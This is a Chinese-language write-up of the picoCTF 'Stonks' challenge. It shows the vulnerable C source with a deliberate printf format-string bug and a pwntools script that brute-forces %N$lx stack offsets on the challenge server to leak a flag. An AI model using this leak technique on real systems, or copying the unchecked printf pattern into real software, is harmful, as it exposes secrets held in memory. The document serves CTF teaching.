题目分析
pwn题目的一种形式是,直接给源码,本题就是:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#define FLAG_BUFFER 128
#define MAX_SYM_LEN 4
typedef struct Stonks {
int shares;
char symbol[MAX_SYM_LEN + 1];
struct Stonks *next;
} Stonk;
typedef struct Portfolios {
int money;
Stonk *head;
} Portfolio;
int view_portfolio(Portfolio *p) {
if (!p) {
return 1;
}
printf("\nPortfolio as of ");
fflush(stdout);
system("date"); // TODO: implement this in C
fflush(stdout);
printf("\n\n");
Stonk *head = p->head;
if (!head) {
printf("You don't own any stonks!\n");
}
while (head) {
printf("%d shares of %s\n", head->shares, head->symbol);
head = head->next;
}
return 0;
}
Stonk *pick_symbol_with_AI(int shares) {
if (shares < 1) {
return NULL;
}
Stonk *stonk = malloc(sizeof(Stonk));
stonk->shares = shares;
int AI_symbol_len = (rand() % MAX_SYM_LEN) + 1;
for (int i = 0; i <= MAX_SYM_LEN; i++) {
if (i < AI_symbol_len) {
stonk->symbol[i] = 'A' + (rand() % 26);
} else {
stonk->symbol[i] = '\0';
}
}
stonk->next = NULL;
return stonk;
}
int buy_stonks(Portfolio *p) {
if (!p) {
return 1;
}
char api_buf[FLAG_BUFFER]; // 在栈中
FILE *f = fopen("api","r");
if (!f) {
printf("Flag file not found. Contact an admin.\n");
exit(1);
}
fgets(api_buf, FLAG_BUFFER, f); // flag读取在了这里
int money = p->money;
int shares = 0;
Stonk *temp = NULL;
printf("Using patented AI algorithms to buy stonks\n");
while (money > 0) {
shares = (rand() % money) + 1;
temp = pick_symbol_with_AI(shares);
temp->next = p->head;
p->head = temp;
money -= shares;
}
printf("Stonks chosen\n");
// TODO: Figure out how to read token from file, for now just ask
char *user_buf = malloc(300 + 1);
printf("What is your API token?\n");
scanf("%300s", user_buf);
printf("Buying stonks with token:\n");
printf(user_buf); // 格式化字符串漏洞,泄露栈数据
// TODO: Actually use key to interact with API
view_portfolio(p);
return 0;
}
Portfolio *initialize_portfolio() {
Portfolio *p = malloc(sizeof(Portfolio));
p->money = (rand() % 2018) + 1;
p->head = NULL;
return p;
}
void free_portfolio(Portfolio *p) {
Stonk *current = p->head;
Stonk *next = NULL;
while (current) {
next = current->next;
free(current);
current = next;
}
free(p);
}
int main(int argc, char *argv[])
{
setbuf(stdout, NULL);
srand(time(NULL));
Portfolio *p = initialize_portfolio(); // malloc
if (!p) {
printf("Memory failure\n");
exit(1);
}
int resp = 0;
printf("Welcome back to the trading app!\n\n");
printf("What would you like to do?\n");
printf("1) Buy some stonks!\n");
printf("2) View my portfolio\n");
scanf("%d", &resp); // 输入选项
if (resp == 1) {
buy_stonks(p);
} else if (resp == 2) {
view_portfolio(p);
}
free_portfolio(p);
printf("Goodbye!\n");
exit(0);
}
一个小技巧:对于有源码的形式,可以直接编译一下去调试,编译的时候可能就提示出潜在的漏洞点了
➜ pwn-Stonks gcc vuln.c -o vuln
vuln.c: In function ‘buy_stonks’:
vuln.c:93:2: warning: format not a string literal and no format arguments [-Wformat-security]
93 | printf(user_buf);
| ^~~~~~
很显然,是格式化字符串漏洞
在触发漏洞前的代码里:
char api_buf[FLAG_BUFFER]; // 在栈中
FILE *f = fopen("api","r");
if (!f) {
printf("Flag file not found. Contact an admin.\n");
exit(1);
}
fgets(api_buf, FLAG_BUFFER, f); // flag读取在了这里
flag被读取在了栈中,以栈中数据的形式保存的
漏洞利用
要通过格式化字符串漏洞获取栈中的数据,没法用%s
来获取,因为是64位程序,所以可以直接用%lx
来读取十六进制,然后自己转换成字符串
对于本题,可以不去算偏移,直接爆破即可:
#!/bin/python3
from pwn import *
warnings.filterwarnings(action='ignore',category=BytesWarning)
context.log_level = 'warn'
FILE_NAME = "a.out"
REMOTE_HOST = "mercury.picoctf.net"
REMOTE_PORT = 20195
# nc mercury.picoctf.net 20195
elf = context.binary = ELF(FILE_NAME)
#libc = elf.libc
gs = '''
continue
'''
def start():
if args.REMOTE:
return remote(REMOTE_HOST,REMOTE_PORT)
if args.GDB:
return gdb.debug(elf.path, gdbscript=gs)
else:
return process(elf.path)
def str_GetPrintableStr(s:str):
return "".join(i for i in s if i.isprintable())
def str_ReverseByteSequence(s:str):
return "".join(s[i-1:i+1] for i in range(len(s)-1,-1,-2))
def str_PrintAndSearchFlag(input_string:str,pattern =r"\{(.+?)\}"):
matches = re.findall(pattern, input_string)
for match in matches:
highlighted = "\033[1;31m{"+f"{match}"+"}\033[0m"
input_string = input_string.replace(f"{{{match}}}", highlighted)
print(input_string)
return input_string
# =============================================================================
# ============== exploit ===================
buf = ""
bufr = ""
count = 0
while count<50:
count +=1
try:
io = start()
sleep(0.2)
io.sendlineafter(b"2) View my portfolio\n",b"1")
sleep(0.2)
io.sendlineafter(b"What is your API token?\n",f"%{count}$016lx".encode())
io.recvuntil(b"Buying stonks with token:\n")
s = io.recvline()[:-1].decode()
buf += s
bufr += str_ReverseByteSequence(s)
#print(s)
io.close()
except:
continue
buf_str = "".join(chr(int(buf[i-1:i+1],16)) for i in range(1,len(buf)+1,2))
str_PrintAndSearchFlag(str_GetPrintableStr(buf_str))
bufr_str = "".join(chr(int(bufr[i-1:i+1],16)) for i in range(1,len(bufr)+1,2))
str_PrintAndSearchFlag(str_GetPrintableStr(bufr_str))
# =============================================================================
io.interactive()